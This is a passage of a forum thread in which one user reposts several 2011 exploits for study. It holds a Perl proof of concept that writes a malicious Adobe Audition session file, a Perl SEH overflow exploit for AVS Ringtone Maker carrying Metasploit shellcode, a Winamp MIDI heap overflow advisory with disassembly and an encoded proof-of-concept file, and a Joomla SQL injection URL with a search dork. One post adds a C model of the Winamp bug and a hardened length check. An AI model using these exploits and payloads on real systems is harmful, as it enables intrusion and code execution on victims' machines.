Author: DarK-Z [bridex], forum user
Source code! [This post was edited by DarK-Z (bridex) on May 19 at 20:51]
Original poster, posted 11-05-19 20:11
Reply: DarK-Z [bridex], forum user
For friends who read English well to study! [This post was edited by DarK-Z (bridex) on May 20 at 11:00]
Floor 1, posted 11-05-19 20:23
Reply: DarK-Z [bridex], forum user
From 2011: Adobe Audition 3.0 (build 7283) Session File Handling, with source code too.

SEBUG-ID: 20546  Published: 2011-05-12  Test method: [www.sebug.net] The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!

#!/usr/bin/perl
#
#
# Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
#
#
# Vendor: Adobe Systems Inc.
# Product web page: http://www.adobe.com/products/audition/
# Affected version: 3.0 (build 7238)
#
# Summary: Recording, mixing, editing, and mastering ― Adobe® Audition® 3 software is the
# all-in-one toolset for professional audio production.
#
# Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES
# (session) format file. The application fails to sanitize the user input resulting in a
# memory corruption, overwriting several memory registers which can aid the attacker to gain
# the power of executing arbitrary code or denial of service.
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             liquidworm gmail com
#                             Zero Science Lab - http://www.zeroscience.mk
#
#
# http://img225.imageshack.us/img225/9871/boferror.jpg
#
#
# Zero Science Lab Advisory ID: ZSL-2011-5012
# Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php
#
# Adobe Advisory ID: APSB11-10
# Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html
#
# CVE ID: CVE-2011-0614
#
#
# 18.09.2009
#

# "COOLNESS" file signature, then the "hdr " chunk header, then the 0x41 filler
$data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00".
"\x68\x64\x72\x20\xF0\x03\x00\x00\x22\x56\x00\x00".
"\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00".
"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
"\x00\x00\xF0\x3F\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
"\x41\x41\x41\x41\x00";

$FNAME = "Assassin.ses";

print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";
open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!";
binmode(ses);   # write raw bytes: in Windows text mode the 0x0A in the header would become 0x0D 0x0A
print ses "$data";
sleep(1);
close (ses);
print "\n[*] Malicious session file successfully crafted!\r\n\n";

(From sebug.net, 2011-05-13)
Floor 2, posted 11-05-19 20:27
Reply: DarK-Z [bridex], forum user
AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
Floor 3, posted 11-05-19 20:34
Reply: DarK-Z [bridex], forum user
[1337day.com / Inj3ct0r Team ASCII-art banner: "Exploit database separated by exploit type (local, remote, DoS, etc.)"; Site: 1337day.com; Support e-mail: submit[at]1337day.com; "I'm KedAns-Dz member from Inj3ct0r Team"]

#!/usr/bin/perl

system("cls");

sub logo(){
print q'
[KedAns-Dz "Algerian HaCker" ASCII-art logo; Site: 1337day.com; Twitter: @kedans; ked-h@hotmail.com; HaCkerS-StreeT-Team; (c) 2011, Inj3ct0r Team]
AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
';
}
logo();

###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###

my $junk = "\x41" x 4123 ;              # Buffer Junk
my $jump = "\xeb\x06\x90\x90";          # Short Jump
my $eip = pack("V", 0x00401E3C);        # EIP
my $seh = pack("V", 0x7C839AC0);        # SEH

# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode =
"\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";

my $exploit = $junk.$jump.$eip.$seh.$shellcode;

open (FILE ,'> KedAns.wav') || die "Cannot create KedAns.wav: $!";
binmode(FILE);    # raw bytes: the addresses and shellcode must not go through newline translation
print FILE $exploit;
close (FILE);

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org)
# (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================

Wow, that image is a bit scary!
Floor 4, posted 11-05-19 20:35
Reply: DarK-Z [bridex], forum user
Winamp 5.61 'in_midi' component heap overflow
Floor 5, posted 11-05-19 20:37
Reply: DarK-Z [bridex], forum user
# Exploit Title: Winamp 'in_midi' component heap overflow
# Date: 05/14/2011
# Author: Alexander Gavrun (http://0x1byte.blogspot.com/)
# Software Link: http://www.winamp.com/
# Version: 5.61
# Tested on: Windows 7

The vulnerability occurs while parsing a MIDI file with a specially crafted System Exclusive message type (event). The System Exclusive message type, according to the MIDI specification (http://www.gweep.net/~prefect/eng/reference/protocol/midispec.html), begins with 0xF0 and ends with a 0xF7 byte (after the data bytes).

Processing of this message type begins in the sub_766410F function (disassembled in_midi.dll of Winamp v.5.61).

; .....
.text:0766414D loc_766414D:                          ; CODE XREF: sub_766410F+36 j
.text:0766414D     add     ebx, eax
.text:0766414F     lea     esi, [ebx+edi]
.text:07664152     mov     al, [esi]                 ; esi points to message begin
.text:07664154     mov     [ebp+var_C], ebx
.text:07664157     cmp     al, 0FFh                  ; is first byte equal to 0xFF?
.text:07664159     jnz     loc_7664328
; .....
.text:07664328 loc_7664328:                          ; CODE XREF: sub_766410F+4A j
.text:07664328     mov     edx, 0F0h
.text:0766432D     mov     cl, al
.text:0766432F     and     cl, dl
.text:07664331     cmp     cl, dl
.text:07664333     jnz     short loc_7664398
.text:07664335     cmp     al, dl
.text:07664337     jnz     short loc_766438E         ; is first byte equal 0xF0 (is SysEx message type?)?
.text:07664339     mov     eax, [ebp+arg_8]
.text:0766433C     mov     edi, [ebp+var_8]
.text:0766433F     sub     eax, ebx
.text:07664341     push    eax
.text:07664342     mov     ecx, esi
.text:07664344     mov     [ebp+var_10], edi
.text:07664347     call    sub_766D702
.text:0766434C     pop     ecx
.text:0766434D     mov     ecx, [ebp+arg_10]
.text:07664350     add     edi, ecx
.text:07664352     push    edi
.text:07664353     push    eax                       ; SysEx message size, calculated by sub_766D702
.text:07664354     push    esi
.text:07664355     mov     esi, [ebp+arg_0]
.text:07664358     mov     edi, [esi+30h]
.text:0766435B     mov     [ebp+var_24], eax
.text:0766435E     call    sub_766D894

The sub_766D702 function searches for the 0xF7 byte and counts the size of the SysEx message. Searching starts from the 3rd byte, which means that the minimal value the function might return is 3.

; .....
.text:0766D702 sub_766D702 proc near
.text:0766D702     push    ebp
.text:0766D703     mov     ebp, esp
.text:0766D705     xor     eax, eax
.text:0766D707     inc     eax                       ; eax = 1
.text:0766D708     cmp     [ebp+arg_0], eax          ; arg_0 - MTrk chunk size (read from midi file)
.text:0766D70B     jle     short loc_766D719         ; jump is not taken
.text:0766D70D
.text:0766D70D loc_766D70D:                          ; CODE XREF: sub_766D702+15 j
.text:0766D70D     inc     eax                       ; eax = 2
.text:0766D70E     cmp     byte ptr [eax+ecx], 0F7h  ; check for 0xF7 byte
.text:0766D712     jz      short loc_766D731
.text:0766D714     cmp     eax, [ebp+arg_0]
.text:0766D717     jl      short loc_766D70D
; .....
.text:0766D731 loc_766D731:                          ; CODE XREF: sub_766D702+10 j
.text:0766D731     inc     eax                       ; eax = 3 (minimal value that this function might return)
.text:0766D732     pop     ebp
.text:0766D733     retn
; .....

sub_766D894 checks the size of the earlier allocated buffer and reallocates it if necessary. Then the data of the SysEx message is copied to this buffer, with a size obtained by subtracting the offset (to the data begin) from the SysEx message size.

.text:0766D894 sub_766D894 proc near                 ; CODE XREF: sub_766410F+24F p
.text:0766D894
; .....
.text:0766D8DC loc_766D8DC:                          ; CODE XREF: sub_766D894+29 j
.text:0766D8DC     mov     eax, [edi]
.text:0766D8DE     push    ebx
.text:0766D8DF     mov     ebx, [edi+14h]
.text:0766D8E2     add     ebx, [ebp+arg_4]
.text:0766D8E5     cmp     ebx, eax                  ; ebx - SysEx message size, eax - buffer size allocated earlier
.text:0766D8E7     jb      short loc_766D900         ; jump is taken (to trigger vuln. SysEx message size must be small).
; .....
.text:0766D900 loc_766D900:                          ; CODE XREF: sub_766D894+53 j
.text:0766D900     mov     eax, [edi+14h]
.text:0766D903     mov     ecx, [edi+0Ch]
.text:0766D906     mov     byte ptr [eax+ecx], 0F0h
.text:0766D90A     mov     eax, [ebp+arg_0]
.text:0766D90D     inc     eax
.text:0766D90E     push    0FFFFFFFFh
.text:0766D910     push    eax                       ; eax - pointer to start of SysEx message plus one
.text:0766D911     lea     esi, [ebp+var_4]
.text:0766D914     call    sub_766D734
; .....

The sub_766D734 function calculates the offset to the data begin by passing over all negative bytes following the first byte (0xF0).

.text:0766D734 sub_766D734 proc near
; .....
.text:0766D734     xor     eax, eax
.text:0766D736     xor     ecx, ecx
.text:0766D738     push    edi
.text:0766D739
.text:0766D739 loc_766D739:                          ; CODE XREF: sub_766D734+20 j
.text:0766D739     cmp     eax, [esp+4+arg_4]        ; arg_4 = 0xFFFFFFFF, eax = 0
.text:0766D73D     jnb     short loc_766D75A         ; jump is not taken
.text:0766D73F     mov     edx, [esp+4+arg_0]
.text:0766D743     mov     dl, [eax+edx]             ; store byte to dl
.text:0766D746     movzx   edi, dl
.text:0766D749     and     edi, 7Fh
.text:0766D74C     shl     ecx, 7
.text:0766D74F     inc     eax                       ; counter
.text:0766D750     or      ecx, edi
.text:0766D752     test    dl, dl
.text:0766D754     js      short loc_766D739         ; is stored byte less than zero?
.text:0766D756     mov     [esi], ecx
.text:0766D758     pop     edi
.text:0766D759     retn
.text:0766D75A ; ---------------------------------------------------------------------------
.text:0766D75A
.text:0766D75A loc_766D75A:                          ; CODE XREF: sub_766D734+9 j
.text:0766D75A     and     dword ptr [esi], 0
.text:0766D75D     pop     edi
.text:0766D75E     retn
.text:0766D75E sub_766D734 endp

Then the value, obtained as [SysEx message size] - [offset to data begin] - 1, is passed as the Size argument to the memcpy function.

; .....
.text:0766D919     mov     esi, [ebp+arg_4]
.text:0766D91C     sub     esi, eax
.text:0766D91E     lea     ecx, [esi-1]              ; ecx = size - offset - 1
.text:0766D921     push    ecx                       ; Size
.text:0766D922     mov     ecx, [ebp+arg_0]
.text:0766D925     mov     [ebp+var_4], eax
.text:0766D928     lea     eax, [eax+ecx+1]
.text:0766D92C     mov     ecx, [edi+0Ch]
.text:0766D92F     push    eax                       ; Src
.text:0766D930     mov     eax, [edi+14h]
.text:0766D933     lea     eax, [eax+ecx+1]
.text:0766D937     push    eax                       ; Dst
.text:0766D938     call    memcpy

Since 0xF7 is less than zero, we can construct a SysEx message so that the offset will be greater than (or equal to) the size. For example, for the following sequence

0xF0 0xFF 0xF7 0xFF 0xFF ...[data]

size = 3 and offset = 4, so ecx = 3 - 4 - 1 = 0xFFFFFFFE, a very big positive value. After that, a heap overflow occurs.

POC file (MIME encoded): poc.mid

begin
TVRoZAAAAAYAAQAQAeBNVHJrAAAAIgDw//f///////9VVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ==

POC Available: http://www.exploit-db.com/sploits/17287.poc.mid
Floor 6, posted 11-05-19 20:42
Reply: DarK-Z [bridex], forum user
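The integer wrap the advisory above walks through, as an added C model written by the editor from that disassembly; it is not Alexander Gavrun's code and not Winamp's in_midi.dll. The function names are mine (the DLL exports none), the two sample SysEx events are constructed here, and the hostile one is chosen so that it reproduces the advisory's size = 3, offset = 4 case. The model keeps the original's bug (the VLQ after 0xF0 is treated as bytes to skip, and 0xF7 has its high bit set, so the skip runs past the terminator) and sets a hardened length check beside it that treats the VLQ as what the Standard MIDI File format says it is: the payload length, bounded by the bytes actually present.

```c
#include <stdint.h>
#include <stdio.h>

/* sub_766D702 in the advisory: scan for the 0xF7 terminator starting at index 2
 * and return index + 1 as the "SysEx message size"; 3 is therefore the minimum.
 * The not-found path of the original is not shown, so this model returns
 * chunk_len there (assumption), and it bounds the scan to the chunk so the demo
 * never reads past its buffer (the original's loop bound is looser). */
static uint32_t sysex_size(const uint8_t *msg, uint32_t chunk_len)
{
    for (uint32_t i = 2; i < chunk_len; i++)
        if (msg[i] == 0xF7)
            return i + 1;
    return chunk_len;
}

/* sub_766D734: MIDI variable-length quantity. Consume bytes while the high bit
 * is set, 7 value bits per byte; return the number of bytes consumed and store
 * the value. Like the original, store 0 if max is reached without a terminator. */
static uint32_t read_vlq(const uint8_t *p, uint32_t max, uint32_t *value)
{
    uint32_t v = 0, i = 0;
    while (i < max) {
        uint8_t b = p[i++];
        v = (v << 7) | (b & 0x7F);
        if (!(b & 0x80)) {
            *value = v;
            return i;
        }
    }
    *value = 0;
    return i;
}

/* The memcpy Size exactly as in_midi computes it: size - offset - 1, unsigned.
 * Because 0xF7 has its high bit set, read_vlq walks straight past the terminator
 * that sysex_size stopped at, so offset can exceed size and the subtraction wraps. */
static uint32_t vuln_copy_len(const uint8_t *msg, uint32_t chunk_len)
{
    uint32_t size = sysex_size(msg, chunk_len);
    uint32_t declared;
    /* the original passes max = 0xFFFFFFFF; chunk_len - 1 keeps the demo in bounds */
    uint32_t offset = read_vlq(msg + 1, chunk_len - 1, &declared);
    return size - offset - 1;
}

/* Hardened version. In an SMF track the VLQ after 0xF0 is the payload length,
 * F7 included. Require a properly terminated VLQ of at most 4 bytes, a length
 * that fits in the bytes that are actually present, and F7 as the last payload
 * byte. Returns the payload length, or -1 for a malformed event. */
static long long safe_copy_len(const uint8_t *msg, uint32_t chunk_len)
{
    if (chunk_len < 3 || msg[0] != 0xF0)
        return -1;
    uint32_t declared;
    uint32_t hdr = read_vlq(msg + 1, chunk_len - 1, &declared);
    if (hdr == 0 || hdr > 4 || (msg[hdr] & 0x80))   /* msg[hdr] is the last VLQ byte */
        return -1;
    uint32_t avail = chunk_len - 1 - hdr;            /* bytes after the length field */
    if (declared == 0 || declared > avail)
        return -1;                                   /* truncated (or empty) event */
    if (msg[1 + hdr + declared - 1] != 0xF7)
        return -1;                                   /* payload must close with F7 */
    return (long long)declared;
}

/* Constructed sample events (not bytes from the PoC file). */
static const uint8_t kHostile[] = { 0xF0, 0xFF, 0xF7, 0xFF, 0x55, 0x55, 0x55, 0x55 };
static const uint8_t kBenign[]  = { 0xF0, 0x03, 0x01, 0x02, 0xF7 };

int main(void)
{
    printf("hostile: size=%u  in_midi memcpy Size=0x%08X  hardened=%lld\n",
           sysex_size(kHostile, sizeof kHostile),
           vuln_copy_len(kHostile, sizeof kHostile),
           safe_copy_len(kHostile, sizeof kHostile));
    printf("benign:  size=%u  in_midi memcpy Size=0x%08X  hardened=%lld\n",
           sysex_size(kBenign, sizeof kBenign),
           vuln_copy_len(kBenign, sizeof kBenign),
           safe_copy_len(kBenign, sizeof kBenign));
    return 0;
}
```

For the hostile event sysex_size stops at the F7 in position 2 (size 3) while read_vlq consumes FF F7 FF 55 (offset 4), giving 3 - 4 - 1 = 0xFFFFFFFE, the advisory's value; the hardened check rejects it because the decoded length cannot fit in the three bytes that remain. For the benign event both paths agree on 3.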
SQL again: Joomla Component com_versioning SQLi Vulnerability
Floor 7, posted 11-05-19 20:43
Reply: DarK-Z [bridex], forum user
SEBUG-ID: 20527  SEBUG-Appdir: Joomla  Published: 2011-05-09  Test method: [www.sebug.net] The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!

#[~] Author : the_cyber_nuxbie
#[~] Home : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found : 09 May 2011.
#[~] Tested : Windows 7 Ultimate 32bit (pirated).
#[!] Dork : inurl:"com_versioning"
______________________________________________________________
[x] X.P.L:
../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!!

- Shout & Greetz:
All Member & Staff SekuritiOnline | www.sekuritionline.net
All Member & Staff YogyaFamilyCode | www.xcode.or.id
All Member & Staff Devilzc0de | www.devilzc0de.org
All Member & Staff Hacker-Newbie | www.hacker-newbie.org
All Member & Staff ECHO | www.echo.or.id
All Member & Staff WhiteCyber | www.whitecyber.net
All Member & Staff MuslemHacker | www.muslimhackers.net
All Member & Staff BinusHacker | www.binushacker.net
All Member & Staff Jasakom | www.jasakom.com
All Member & Staff YogyaCarderLink. | www.yogyacarderlink.web.id
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder | www.indonesiancoder.com
All Member & Staff MagelangCyber | www.magelangcyber.web.id
All Member & Staff Jatim-Crew | www.jatimcrew.org
All Member & Staff Fast-Hacker | www.fasthacker.org
And all forums / cyber communities across Indonesia. :-D, etc...

Sorry bro... I'm still a newbie... :-D Please don't make fun of me... :-( Bruakakakakakak... :-D

- May 09 2011, GMT +09:35 Solo Raya, Indonesia.

(From sebug.net, 2011-05-10)
Floor 8, posted 11-05-19 20:46
Reply: DarK-Z [bridex], forum user
(Firefox & Safari & IE) + QuickTime res://mshtml.dll
